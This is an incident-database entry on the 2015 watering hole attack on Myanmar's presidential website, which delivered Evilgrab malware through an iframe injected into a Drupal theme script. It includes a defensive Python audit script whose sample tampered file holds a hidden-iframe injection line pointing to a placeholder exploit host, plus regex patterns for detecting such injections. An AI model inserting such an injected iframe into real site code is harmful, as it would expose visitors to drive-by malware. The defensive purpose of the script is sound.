
Cyber Incident Victim: Ministry of Information

Date:

May 2015

Location:

Myanmar

Summary

A watering hole attack compromised the President of Myanmar's official website: malicious code injected into a JavaScript file of the site's Drupal theme delivered the Evilgrab malware (also known as Vidgrab) to visitors. The threat actors targeted individuals and organizations associated with the country's political or business activities, and they held unauthorized access to the site for an extended period before its operators took it offline following discovery. The victim organization subsequently migrated the content to a new domain that carried no trace of the injected exploit code, indicating remediation. The incident demonstrates strategic website compromise aimed at intelligence gathering from high-value visitors.

CIA Posture: Available to members
Motives: 2 motives
Tactics, Techniques & Procedures: 2 techniques
Threat Actor: 1 actor
Type: Available to members
Location: Available to members

Description

On May 12, 2015, Unit 42 identified a watering hole attack targeting the official website of the President of Myanmar, hosted at "www.president-office.gov[.]mm." The attackers modified a JavaScript file belonging to the Drupal theme used by the site so that it inserted an inline frame (IFRAME) into the page. Because theme scripts are served with every page, the frame was created automatically whenever a visitor loaded the main page, and it pulled in exploit content from the attackers' infrastructure without any user interaction. Evidence indicated the threat actors had maintained unauthorized access to the website since at least November 2014, suggesting prolonged surveillance or staging before the observed exploitation. The attackers chose this high-profile government platform to harvest information from individuals in Myanmar, from those engaged in political relations with the country, and from organizations doing business there. The delivered payload was identified as the Evilgrab malware (also known as Vidgrab), which is used for data theft from compromised systems: it can capture screenshots, log keystrokes and exfiltrate documents. Specific victim data and operational impacts were not quantified in the available reporting.
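The point to take from the technique is that a single modified theme asset reaches every visitor, so the check a site operator wants is an integrity baseline over the theme's files plus a scan of their contents for injected frames that point off-site. The following Python script is an added example written for this page; it is not Unit 42's tooling or the victim's code. The file name, the sample theme script, and the injected URL (exploit.example) are constructed for the example; only the site's host name is taken from the page.

```python
import hashlib
import re
from urllib.parse import urlparse

# Host name of the compromised site (from the incident description).
SITE_HOST = "www.president-office.gov.mm"

# Constructed sample of a Drupal theme behaviour script before tampering.
# This is not the real file from the incident.
CLEAN_THEME_JS = """(function ($) {
  Drupal.behaviors.exampleTheme = {
    attach: function (context) {
      $('#main-menu', context).addClass('js-enhanced');
    }
  };
})(jQuery);
"""

# Constructed tampered copy: the same script with a hidden iframe appended.
# The URL is a placeholder, not the actual exploit location.
TAMPERED_THEME_JS = CLEAN_THEME_JS + """
document.write('<iframe src="http://exploit.example/landing.html" width="0" height="0" style="display:none"></iframe>');
"""

# An <iframe ... src="..."> literal written into the page (e.g. via document.write).
IFRAME_TAG = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
# An iframe built through the DOM: createElement('iframe') followed shortly by .src = '...'.
IFRAME_DOM = re.compile(
    r"createElement\(\s*['\"]iframe['\"]\s*\)[\s\S]{0,200}?\.src\s*=\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)


def sha256(text: str) -> str:
    """Hex SHA-256 of a file's text, used for the integrity baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def is_offsite(url: str, site_host: str) -> bool:
    """True if the URL names a host other than the site itself.
    Relative URLs have no host and are treated as on-site."""
    host = urlparse(url).hostname
    return host is not None and host.lower() != site_host.lower()


def find_injected_iframes(js_text: str, site_host: str) -> list:
    """Return src URLs of iframes the script would inject that point off-site."""
    found = []
    for pattern in (IFRAME_TAG, IFRAME_DOM):
        for m in pattern.finditer(js_text):
            if is_offsite(m.group(1), site_host):
                found.append(m.group(1))
    return found


def audit_theme_files(files: dict, baseline: dict, site_host: str) -> list:
    """files: path -> current content; baseline: path -> sha256 of known-good content.
    Returns (path, reason) tuples for everything that needs investigation:
    files missing from the baseline, files whose hash changed, and any
    off-site iframe injection found regardless of the hash result."""
    findings = []
    for path, content in files.items():
        expected = baseline.get(path)
        if expected is None:
            findings.append((path, "not in baseline: unexpected file"))
        elif sha256(content) != expected:
            findings.append((path, "hash mismatch: file modified since baseline"))
        for src in find_injected_iframes(content, site_host):
            findings.append((path, f"off-site iframe injection -> {src}"))
    return findings


if __name__ == "__main__":
    # Baseline taken when the theme was known to be clean (constructed path).
    baseline = {"themes/example/js/theme.js": sha256(CLEAN_THEME_JS)}
    # What is on disk now.
    current = {"themes/example/js/theme.js": TAMPERED_THEME_JS}
    for path, reason in audit_theme_files(current, baseline, site_host=SITE_HOST):
        print(f"{path}: {reason}")
```

The baseline must be recorded from a trusted copy of the theme (the package you deployed), not from the live server, since an attacker with months of access can re-hash whatever they changed. The content scan is there to catch what the baseline cannot: a file that was legitimately updated and then tampered with in the same window, or a script that was never baselined at all.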


Following Unit 42's notification to the website operators, administrators took the compromised site offline. A replacement website with identical legitimate content was subsequently established at "www.myanmarpresidentoffice.info"; it retained the structural and thematic elements of the original but contained no trace of the injected exploit code. Moving to a new domain formed part of the remediation, restoring official communications while severing the attackers' access to the old site. Infrastructure analysis showed that the watering hole redirected victims through several intermediary domains before delivering the final Evilgrab payload, but the number of compromised systems and the identity of victims remained unconfirmed. The incident demonstrates deliberate targeting of Myanmar's government web presence for espionage, using a trusted public resource to reach a specific visitor population. No further details on post-incident forensic investigation, attribution to a specific threat group, or broader geopolitical consequences were disclosed in the analyzed source material.

Sources
Sources available to members
1 source